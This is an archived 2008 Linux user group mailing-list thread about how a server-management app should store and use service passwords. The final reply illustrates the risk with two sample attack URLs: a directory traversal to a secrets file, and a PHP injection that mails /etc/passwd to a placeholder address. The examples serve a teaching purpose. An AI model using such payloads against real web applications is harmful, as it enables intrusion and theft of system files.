[Klug-general] password / security question / coding
MacGyveR
macgyver at thedumbterminal.co.uk
Sat Oct 18 22:40:21 UTC 2008
On Saturday 18 Oct 2008, oly wrote:
> On Sat, 2008-10-18 at 20:29 +0100, MacGyveR wrote:
> > On Saturday 18 Oct 2008, Mike Evans wrote:
> > > > obviously storing in plain text is not ideal so looking for the most
> > > > secure solution so let me know, i am not a security expert myself so
> > > > looking for others opinions / ideas.
> > >
> > > Putting passwords in plain in a stored file is not only less than ideal
> > > it is folly. Don't ever (and I mean ever) do it. Even holding them in
> > > the memory of a computer in plain should be done for as short a time as
> > > possible. This can be done by decrypting as late as possible, and once
> > > used ensuring that the memory used by the variable is overwritten.
> > >
> > > If possible I would also suggest that connectivity and authentication
> > > between a server manager and managed servers should be done using tried
> > > and tested security mechanisms, such as ssh validated by certificates
> > > in both directions. Remember that once a hostile party has access to
> > > any machine on the network packet sniffing is trivial.
> > >
> > > Mike
> > >
> > >
> > > _______________________________________________
> > > Kent mailing list
> > > Kent at mailman.lug.org.uk
> > > https://mailman.lug.org.uk/mailman/listinfo/kent
> >
> > if we are just talking about one password, the i would not store it in
> > the app at all, as you could easily write a generic popup to request the
> > users to enter the password when required (say on reconfiguring some
> > service). the kde root password required pop up is an example of this. i
> > personally would not allow this to be cached during the user's session,
> > but this may annoy users, so you might have a system setting and warning
> > dialog for this option.
>
> popups where kind of what i wanted to avoid but may be the root i end up
> going, however it would be a pain in the neck to have to enter the
> password for each query on the ldap server you dont see the kde or gnome
> apps do this they store the passwords for a set period presumably in
> memory.
>
> > if you need credentials for lots of users i would store the passwords in
> > the required encrypted forms for all the services that need them, eg
> > crypt for system accounts and mysql format for mysql accounts. when a new
> > account is added the user will be prompted for the plain password and all
> > the encrypted passwords created. if you add a new service that needs a
> > different encryption type then the user will be prompted as necessary. i
> > cant see that linux based services will use that many different password
> > formats as most support multiple authentication backends.
>
> i am actually already encrypting all passwords it only when connecting
> to services that i need the orignal password to authenticate.
> I can also set the inital passwords in any format already its more the
> connecting after thats baffling me.
>
> also i understand why plain text is bad but would you not have to have
> compromised a server to be able to read it ? at which point surely you
> would be screwed, more a general question to help in my understanding.
>
>
>
> _______________________________________________
> Kent mailing list
> Kent at mailman.lug.org.uk
> https://mailman.lug.org.uk/mailman/listinfo/kent
dont forget any web application can be a potential way into a server for an
attacker, as well as any listening daemons running on a box. If a web app can
read a file then the box does not need to be compromised for the attacker to
get the contents, just the app itself. here is a really basic (and stupid)
example:
the logon url for an app is:
http://url/script.php?template=login.html
an attacker could try (dir traversal):
http://url/script.php?template=../../../../secret/passwd.txt
or even (code execution):
http://url/script.php?template=<%php
mail('a at a.com', '',file_get_contents('/etc/passwd')); %>
these are lame examples but hopefully they make the point.
You cant hide anything in your source so details of where and how passwords
are stored will be found, so when implementing security following best
practices is the way to go.
how about using some kind of master password to encrypt the password storage,
like how mozilla, firefox etc. can store form passwords. as long as you use
strong encryption and dont store the key anywhere, it would make breaking
into that store an unfeasible option for an attacker.
--
--------------------------------
http://www.thedumbterminal.co.uk
More information about the Kent
mailing list